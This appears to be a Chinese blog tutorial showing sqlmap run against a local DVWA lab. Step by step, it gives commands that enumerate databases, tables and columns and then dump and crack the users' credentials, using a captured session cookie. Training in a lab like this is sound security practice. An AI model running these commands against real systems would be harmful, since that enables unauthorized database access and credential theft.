SQLmap注入练习——dvwa

SQLmap注入练习——dvwa

记录一下自己学习的知识点

最近自己一直在学习使用kali,今天我就用kali中的sqlmap演示一下sql注入
我就从dvwa的low级别开始演示,其实同样的操作在medium和high级别也同样能够实现注入

GET提交参数

通过表单或者F12 观察网络模块,我们可以发现dvwa的low级别是GET提交参数,当然也可以通过burpsuite截断来观察。
SQLmap注入练习——dvwa

提取cookie

因为dvwa需要登录后才能提交参数,所以我们要通过cookie来跑sqlmap,直接F12提取cookie
SQLmap注入练习——dvwa

爆数据库名

sqlmap - u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie "security=low; PHPSESSID=2e7f961f6c63f146de8769778081627f" --dbs

如图得到数据库名字

SQLmap注入练习——dvwa

爆表名

因为我们是dvwa,所以数据库名选择dvwa,然后爆dvwa的表名

sqlmap - u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie "security=low; PHPSESSID=2e7f961f6c63f146de8769778081627f" -D dvwa --tables

如图得到dvwa中的表名
SQLmap注入练习——dvwa
我们肯定是对users感兴趣啊,要的就是账号和密码,所以接下来爆users中的列名

爆列名

sqlmap - u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie "security=low; PHPSESSID=2e7f961f6c63f146de8769778081627f" -D dvwa --T users --columns

得到列名如下,我们感兴趣的是user和password
SQLmap注入练习——dvwa

爆账号和密码

接下来就是爆user和password中的数据了,这里我想说的是,你可以在爆数据的时候直接MD5解密,到时候会有选项提示,问你是否用kali中自带的字典进行解密

sqlmap - u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie "security=low; PHPSESSID=2e7f961f6c63f146de8769778081627f" -D dvwa --T users -C user,password --dump

最终得到账号和密码,达到目的
SQLmap注入练习——dvwa
以上过程就是用sqlmap自动注入的过程,自己可以多练练,至于medium和high级别的道理是一样的,最好自己去尝试一下

上一篇:什么TDD,让它见鬼去吧!


下一篇:多线程与并发 | 线程池